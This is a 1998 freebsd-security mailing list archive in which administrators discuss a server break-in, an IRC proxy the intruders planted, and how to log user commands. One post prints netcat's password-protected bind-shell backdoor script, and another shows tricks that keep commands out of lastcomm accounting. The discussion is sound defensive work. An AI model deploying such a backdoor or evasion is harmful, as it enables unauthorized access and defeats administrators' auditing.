WAA01656; Thu, 27 Aug 1998 22:32:08 -0400 (EDT) (envelope-from gjp@gjp.erols.com) X-Mailer: exmh version 2.0.1 12/23/97 To: Brian Behlendorf cc: Wilson MacGyver , security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: post breakin log In-reply-to: Your message of "Thu, 27 Aug 1998 11:16:01 PDT." <19980827182323.6798.qmail@hyperreal.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 27 Aug 1998 22:32:08 -0400 Message-ID: <1652.904271528@gjp.erols.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brian Behlendorf wrote in message ID <19980827182323.6798.qmail@hyperreal.org>: > Is there a fool-proof way to get user histories like this? I got one once > only because the cracker was lame enough to forget to delete his > .bash_history file. Presuming root isn't compromised of course... Force the history files to be created with uappend flag set and run with a non zero security level. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 19:36:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA00198 for freebsd-security-outgoing; Thu, 27 Aug 1998 19:36:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from banshee.cs.uow.edu.au (banshee.cs.uow.edu.au [130.130.188.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA29894; Thu, 27 Aug 1998 19:35:04 -0700 (PDT) (envelope-from ncb05@banshee.cs.uow.edu.au) Received: (from ncb05@localhost) by banshee.cs.uow.edu.au (8.9.1/8.9.1) id MAA15684; Fri, 28 Aug 1998 12:33:58 +1000 (EST) Date: Fri, 28 Aug 1998 12:33:57 +1000 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: "Jan B. Koum " cc: "Ron 'The Insane One' Rosson" , dima@best.net, axl@iafrica.com, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: SSH port In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 27 Aug 1998, Jan B. Koum wrote: [snip] > > And yes, the license does blow. That means ISPs will have to pay > if they want to use ssh2 > > -- Yan > > www.best.com/~jkb/ Unix users of the world unite: > www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com > "Turn up the lights, I don't want to go home in the dark." > There are people working on a free ssh replacement (UK-based), which is called "psst". The url is http://www.net.lut.ac.uk/psst/. Looks like they need some more developers though. Nick -- Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A "When in doubt, ask someone wiser than yourself..." -unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 20:16:30 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA06767 for freebsd-security-outgoing; Thu, 27 Aug 1998 20:16:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Mercury.unix.acs.cc.unt.edu (mercury.acs.unt.edu [129.120.220.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA06703 for ; Thu, 27 Aug 1998 20:16:05 -0700 (PDT) (envelope-from john@unt.edu) Received: from leonardo.cascss.unt.edu (leonardo.cascss.unt.edu [129.120.32.203]) by Mercury.unix.acs.cc.unt.edu (8.8.8/8.8.8) with ESMTP id WAA06006; Thu, 27 Aug 1998 22:15:06 -0500 (CDT) Received: (from john@localhost) by leonardo.cascss.unt.edu (8.8.8/8.6.9) id WAA11164; Thu, 27 Aug 1998 22:12:27 -0500 (CDT) From: john Message-Id: <199808280312.WAA11164@leonardo.cascss.unt.edu> Subject: Re: bnc In-Reply-To: from "Timothy R. Platt" at "Aug 27, 98 06:39:13 pm" To: tplatt@nethampton.com (Timothy R. Platt) Date: Thu, 27 Aug 1998 22:12:26 -0500 (CDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org We had a breakin on our web server a while back. It was a very simple intrusion--they had sniffed a password and just trounced right in. They installed bnc and it was an irc proxy. I imagine it was the same thing. > Huh? From the bnc distribution README (bnc is in the FreeBSD ports > collection, btw): > > 1.INTRODUCTION > BNC is a simple program designed to Proxy irc sessions. > It is user configurable using the file bnc.conf and includes > multi-user, passwords, and other basic necessities. > NOW INCLUDES VIRTUAL HOSTS!!! ;P > > > This is the only bnc I've seen.. > > Tim > > > > Arggh! I just remembered. Gary is correct If you download netcat > >it comes with some scripts, bnc is one of them. It will listen on a port To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 20:24:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA07862 for freebsd-security-outgoing; Thu, 27 Aug 1998 20:24:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA07804 for ; Thu, 27 Aug 1998 20:24:01 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id UAA13916; Thu, 27 Aug 1998 20:21:41 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Thu, 27 Aug 1998 20:21:41 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: "Timothy R. Platt" cc: security@FreeBSD.ORG Subject: Re: post breakin log In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ugh.. you are right. I was thinking of bsh (I guess they both start with b FWIW). 0wn# pwd /usr/home/jkb/nc/scripts 0wn# cat bsh #! /bin/sh ## a little wrapper to "password" and re-launch a shell-listener. ## Arg is taken as the port to listen on. Define "NC" to point wherever. NC=nc case "$1" in ?* ) LPN="$1" export LPN sleep 1 echo "-l -p $LPN -e $0" | $NC > /dev/null 2>&1 & echo "launched on port $LPN" exit 0 ;; esac # here we play inetd echo "-l -p $LPN -e $0" | $NC > /dev/null 2>&1 & while read qq ; do case "$qq" in # here's yer password gimme ) cd / exec csh -i ;; esac done -- Yan www.best.com/~jkb/ Unix users of the world unite: www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com "Turn up the lights, I don't want to go home in the dark." On Thu, 27 Aug 1998, Timothy R. Platt wrote: >Huh? From the bnc distribution README (bnc is in the FreeBSD ports >collection, btw): > >1.INTRODUCTION > BNC is a simple program designed to Proxy irc sessions. > It is user configurable using the file bnc.conf and includes > NOW INCLUDES VIRTUAL HOSTS!!! ;P > >2.COMPILATION > I would tell you how to un-tar/gz this file, but your > reading this so why would you need help :-) > To compile bnc simply type: > make > >3.CONFIGURATION > The configuration file give BNC the nessesary info to > process such as the port to bind to and what port to request > when a conn is requested, also passwords and maxusers. > >4.LOADING > type: > bnc > >5.CLIENT SIDE > When using various clients you connect to the server in > which the daemon is ran. In ircii and other clients you will > have to give your password by typing /quote pass to > continue, in Mirc you can simply /server bnc.server.net port pass > to connect. Once your pass is ok'ed you can tell it to connect > to an irc server by typing /quote conn [irc.server.net] . > > added /quote VIP [Virtual.host] for on the fly ip switching. It must > be done before you /quote conn. > > >6.GNU > Yeah you know how this works so just realize this is gnu. > > multi-user, passwords, and other basic necessities. [humiliating stuff sniped] > > >This is the only bnc I've seen.. > >Tim > > >> Arggh! I just remembered. Gary is correct If you download netcat >>it comes with some scripts, bnc is one of them. It will listen on a port >>and upon connect will drop you in to shell as root. Please do: >> >># netstat -an | grep LIST >> >>and check to make sure you know what all the ports are. If I'd be you I'd >>re-install since who knows what you at going with crontab, at, mail >>aliases, etc. >> >>-- Yan >> >>www.best.com/~jkb/ Unix users of the world unite: >>www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com >>"Turn up the lights, I don't want to go home in the dark." >> > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 20:27:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA08212 for freebsd-security-outgoing; Thu, 27 Aug 1998 20:27:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tasam.com (tasam.com [198.232.144.22]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA08158 for ; Thu, 27 Aug 1998 20:26:45 -0700 (PDT) (envelope-from clash@tasam.com) Received: from bug (bug.tasam.com [198.232.144.254]) by tasam.com (8.9.1/8.9.1) with SMTP id XAA07956; Thu, 27 Aug 1998 23:25:15 -0400 (EDT) Message-ID: <00bb01bdd233$76594990$f10408d1@bug.tasam.com> From: "Joe Gleason" To: "Wilson MacGyver" , , "Brian Behlendorf" Subject: Re: post breakin log Date: Thu, 27 Aug 1998 23:23:53 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.2110.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You could always make a custom bash that sends each command to syslog as it is done. ;-) Then you could have your syslog log it to a remote system. Joe Gleason Tasam >At 01:38 AM 8/27/98 -0400, Wilson MacGyver wrote: >>the log from history follows. > >Is there a fool-proof way to get user histories like this? I got one once >only because the cracker was lame enough to forget to delete his >.bash_history file. Presuming root isn't compromised of course... > > Brian > > >--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-- >"Common sense is the collection of prejudices | brian@apache.org >acquired by the age of eighteen." - Einstein | brian@hyperreal.org > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 21:57:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA21902 for freebsd-security-outgoing; Thu, 27 Aug 1998 21:57:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA21895; Thu, 27 Aug 1998 21:56:53 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id VAA28120; Thu, 27 Aug 1998 21:55:59 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Thu, 27 Aug 1998 21:55:59 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: Gary Palmer cc: Brian Behlendorf , Wilson MacGyver , security@FreeBSD.ORG Subject: Shell history (Was: Re: post breakin log) In-Reply-To: <1652.904271528@gjp.erols.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is assuming intruder will not try to change shell, turn off history within the shell and is in general pretty clueless when it comes to shell history. :) A friend of mine came up with an idea to create a shell which would log everything a user does.. not via shell history mechanism, but rather ala watch(8). Everything user types would go into some files somewhere. Then again, nothing ever came out of it. -- Yan www.best.com/~jkb/ Unix users of the world unite: www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com "Turn up the lights, I don't want to go home in the dark." On Thu, 27 Aug 1998, Gary Palmer wrote: >Brian Behlendorf wrote in message ID ><19980827182323.6798.qmail@hyperreal.org>: >> Is there a fool-proof way to get user histories like this? I got one once >> only because the cracker was lame enough to forget to delete his >> .bash_history file. Presuming root isn't compromised of course... > >Force the history files to be created with uappend flag set and run with a non >zero security level. > >Gary >-- >Gary Palmer FreeBSD Core Team Member >FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 22:09:37 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA23046 for freebsd-security-outgoing; Thu, 27 Aug 1998 22:09:37 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA23041 for ; Thu, 27 Aug 1998 22:09:35 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id WAA29901; Thu, 27 Aug 1998 22:08:37 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Thu, 27 Aug 1998 22:08:36 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: Joe Gleason cc: Wilson MacGyver , security@FreeBSD.ORG, Brian Behlendorf Subject: Shell history (Was: Re: post breakin log) In-Reply-To: <00bb01bdd233$76594990$f10408d1@bug.tasam.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What if the user would be to switch shell or to install their own? I do not think one should depend on shell history to log all what user does. Best way to implement something like watch(8) to check the ttys you want or to automatically start when someone attaches to a tty. Again, this is also flawed.. what if someone simply continues to use root shell they got through a popper overflow? No tty, no entry in wtmp... have fun getting their command history. But wait... tcpdump. Using something like NFR to capture the session for you should work unless something like ssh is used. Ideas? Opinions? Flames? How would YOU monitor what your users are doing if you had to? -- Yan www.best.com/~jkb/ Unix users of the world unite: www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com "Turn up the lights, I don't want to go home in the dark." On Thu, 27 Aug 1998, Joe Gleason wrote: >You could always make a custom bash that sends each command to syslog as it >is done. ;-) > >Then you could have your syslog log it to a remote system. > >Joe Gleason >Tasam > > >>At 01:38 AM 8/27/98 -0400, Wilson MacGyver wrote: >>>the log from history follows. >> >>Is there a fool-proof way to get user histories like this? I got one once >>only because the cracker was lame enough to forget to delete his >>.bash_history file. Presuming root isn't compromised of course... >> >> Brian >> >> >>--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-- >>"Common sense is the collection of prejudices | brian@apache.org >>acquired by the age of eighteen." - Einstein | brian@hyperreal.org >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of the message >> > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 22:17:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA23916 for freebsd-security-outgoing; Thu, 27 Aug 1998 22:17:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tasam.com (tasam.com [198.232.144.22]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA23905 for ; Thu, 27 Aug 1998 22:17:27 -0700 (PDT) (envelope-from clash@tasam.com) Received: from bug (bug.tasam.com [198.232.144.254]) by tasam.com (8.9.1/8.9.1) with SMTP id BAA28628; Fri, 28 Aug 1998 01:16:31 -0400 (EDT) Message-ID: <002001bdd242$f1e3baf0$f10408d1@bug.tasam.com> From: "Joe Gleason" To: "Jan B. Koum " Cc: Subject: Re: Shell history (Was: Re: post breakin log) Date: Fri, 28 Aug 1998 01:15:46 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.2110.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I don't know that much kernel stuff, but what if you hacked the kernel so that whatever syscall opens/forks a new process will log the process name and parameters? That and having watch running, telling it to restart on reconnect to a tty and be watching each tty that way should give you lots of data. I think the best security measure would be a custom compiles who and or w command that logs if anyone uses it more that once per 20 seconds. You can always tell if someone is up to something by their use of the who command. ;-) Joe Gleason Tasam > > What if the user would be to switch shell or to install their own? > > I do not think one should depend on shell history to log all what > user does. Best way to implement something like watch(8) to check > the ttys you want or to automatically start when someone attaches > to a tty. Again, this is also flawed.. what if someone simply > continues to use root shell they got through a popper overflow? > No tty, no entry in wtmp... have fun getting their command > history. But wait... tcpdump. Using something like NFR to capture > the session for you should work unless something like ssh is used. > > Ideas? Opinions? Flames? How would YOU monitor what your users are > doing if you had to? > >-- Yan > >www.best.com/~jkb/ Unix users of the world unite: >www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com >"Turn up the lights, I don't want to go home in the dark." > >On Thu, 27 Aug 1998, Joe Gleason wrote: > >>You could always make a custom bash that sends each command to syslog as it >>is done. ;-) >> >>Then you could have your syslog log it to a remote system. >> >>Joe Gleason >>Tasam >> >> >>>At 01:38 AM 8/27/98 -0400, Wilson MacGyver wrote: >>>>the log from history follows. >>> >>>Is there a fool-proof way to get user histories like this? I got one once >>>only because the cracker was lame enough to forget to delete his >>>.bash_history file. Presuming root isn't compromised of course... >>> >>> Brian >>> >>> >>>--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-- >>>"Common sense is the collection of prejudices | brian@apache.org >>>acquired by the age of eighteen." - Einstein | brian@hyperreal.org >>> >>>To Unsubscribe: send mail to majordomo@FreeBSD.org >>>with "unsubscribe freebsd-security" in the body of the message >>> >> >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of the message >> > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 22:21:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA24449 for freebsd-security-outgoing; Thu, 27 Aug 1998 22:21:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from henry.cs.adfa.oz.au (henry.cs.adfa.oz.au [131.236.21.158]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA24433 for ; Thu, 27 Aug 1998 22:20:55 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.oz.au) Received: (from wkt@localhost) by henry.cs.adfa.oz.au (8.7.5/8.7.3) id PAA04932; Fri, 28 Aug 1998 15:19:59 +1000 (EST) From: Warren Toomey Message-Id: <199808280519.PAA04932@henry.cs.adfa.oz.au> Subject: Re: Shell history To: jkb@best.com (Jan B. Koum) Date: Fri, 28 Aug 1998 15:19:59 +1000 (EST) Cc: security@FreeBSD.ORG In-Reply-To: from "Jan B. Koum" at "Aug 27, 98 10:08:36 pm" Reply-To: wkt@cs.adfa.oz.au X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article by Jan B. Koum: > What if the user would be to switch shell or to install their own? > I do not think one should depend on shell history to log all what > user does. How would YOU monitor what your users are > doing if you had to? accton(8), lastcomm(1) Warren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 22:33:15 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA25472 for freebsd-security-outgoing; Thu, 27 Aug 1998 22:33:15 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA25467 for ; Thu, 27 Aug 1998 22:33:13 -0700 (PDT) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id XAA02314; Thu, 27 Aug 1998 23:32:07 -0600 (MDT) Message-Id: <199808280532.XAA02314@lariat.lariat.org> X-Sender: brett@mail.lariat.org X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1.0.49 (Beta) Date: Thu, 27 Aug 1998 23:30:58 -0600 To: "Joe Gleason" , "Jan B. Koum " From: Brett Glass Subject: Re: Shell history (Was: Re: post breakin log) Cc: In-Reply-To: <002001bdd242$f1e3baf0$f10408d1@bug.tasam.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:15 AM 8/28/98 -0400, Joe Gleason wrote: >I think the best security measure would be a custom compiles who and or w >command that logs if anyone uses it more that once per 20 seconds. You can >always tell if someone is up to something by their use of the who command. That'd be me, the sysadmin. ;-) --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 22:44:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA26834 for freebsd-security-outgoing; Thu, 27 Aug 1998 22:44:34 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA26825 for ; Thu, 27 Aug 1998 22:44:27 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id WAA06398; Thu, 27 Aug 1998 22:43:19 -0700 (PDT) Message-Id: <199808280543.WAA06398@burka.rdy.com> Subject: Re: Shell history In-Reply-To: <199808280519.PAA04932@henry.cs.adfa.oz.au> from Warren Toomey at "Aug 28, 1998 3:19:59 pm" To: wkt@cs.adfa.oz.au Date: Thu, 27 Aug 1998 22:43:19 -0700 (PDT) Cc: jkb@best.com, security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL45 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warren Toomey writes: > In article by Jan B. Koum: > > What if the user would be to switch shell or to install their own? > > I do not think one should depend on shell history to log all what > > user does. How would YOU monitor what your users are > > doing if you had to? > > accton(8), lastcomm(1) It won't tell you much. Not in its' current state. It would be a good idea to extend acct to log everything, including program switches and (possibly) some stuff from the enviroment. Also it would be a good idea to be able to log information on per-user basis. > > Warren > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 23:07:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA29362 for freebsd-security-outgoing; Thu, 27 Aug 1998 23:07:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA29353 for ; Thu, 27 Aug 1998 23:06:55 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id XAA06690; Thu, 27 Aug 1998 23:05:57 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Thu, 27 Aug 1998 23:05:56 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: wkt@cs.adfa.oz.au cc: security@FreeBSD.ORG Subject: Re: Shell history In-Reply-To: <199808280519.PAA04932@henry.cs.adfa.oz.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 28 Aug 1998, Warren Toomey wrote: >In article by Jan B. Koum: >> What if the user would be to switch shell or to install their own? >> I do not think one should depend on shell history to log all what >> user does. How would YOU monitor what your users are >> doing if you had to? > > accton(8), lastcomm(1) > > Warren > Once can just "cp" the executable. % cp /sbin/ifconfig ./.a % ./.a -a vx0: flags=8843 mtu 1500 inet 192.168.1.2 netmask 0xffffff00 broadcast 192.168.1.255 ether 00:60:08:15:bc:65 lp0: flags=8810 mtu 1500 tun0: flags=8010 mtu 1500 lo0: flags=8049 mtu 16384 inet 127.0.0.1 netmask 0xff000000 % lastcomm | grep ifconfig % lastcomm | grep .a lastcomm - jkb ttyp3 0.00 secs Thu Aug 27 22:56 .a - jkb ttyp3 0.00 secs Thu Aug 27 22:56 And if the binary is setuid... exec: % exec su Password: nfr# lastcomm hostname - root ttyp3 0.00 secs Thu Aug 27 22:52 lastcomm -S root ttyp2 0.00 secs Thu Aug 27 22:52 lastcomm -S root ttyp2 0.00 secs Thu Aug 27 22:52 vi - jkb ttyp3 0.03 secs Thu Aug 27 22:52 lastcomm -S root ttyp2 0.00 secs Thu Aug 27 22:51 I am sure there are probably many other ways around lastcomm. I hope you are not relaying 100% on the output of lastcomm to tell you what users are up to. -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 00:56:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA12963 for freebsd-security-outgoing; Fri, 28 Aug 1998 00:56:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA12957 for ; Fri, 28 Aug 1998 00:56:20 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id IAA12171 for ; Fri, 28 Aug 1998 08:55:25 +0100 (BST) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id IAA13224 for ; Fri, 28 Aug 1998 08:55:24 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Fri, 28 Aug 1998 08:55:24 +0100 (BST) From: Jay Tribick X-Sender: netadmin@na.nu.na.nu To: security@FreeBSD.ORG Subject: Re: Shell history In-Reply-To: <199808280543.WAA06398@burka.rdy.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org | > > What if the user would be to switch shell or to install their own? | > > I do not think one should depend on shell history to log all what | > > user does. How would YOU monitor what your users are | > > doing if you had to? | > | > accton(8), lastcomm(1) | | It won't tell you much. Not in its' current state. It would be a good idea | to extend acct to log everything, including program switches and (possibly) | some stuff from the enviroment. Also it would be a good idea to be able | to log information on per-user basis. Could we not modify the [kernel] to log all activity on the ttyp's to a file? Regards, Jay Tribick -- [| Network Administrator | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact information |] [| T: +44 (0)1273 677633 F: +44 (0)1273 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 01:15:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA15517 for freebsd-security-outgoing; Fri, 28 Aug 1998 01:15:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA15512 for ; Fri, 28 Aug 1998 01:15:53 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id BAA07281; Fri, 28 Aug 1998 01:14:53 -0700 (PDT) Message-Id: <199808280814.BAA07281@burka.rdy.com> Subject: Re: Shell history In-Reply-To: from Jay Tribick at "Aug 28, 1998 8:55:24 am" To: netadmin@fastnet.co.uk 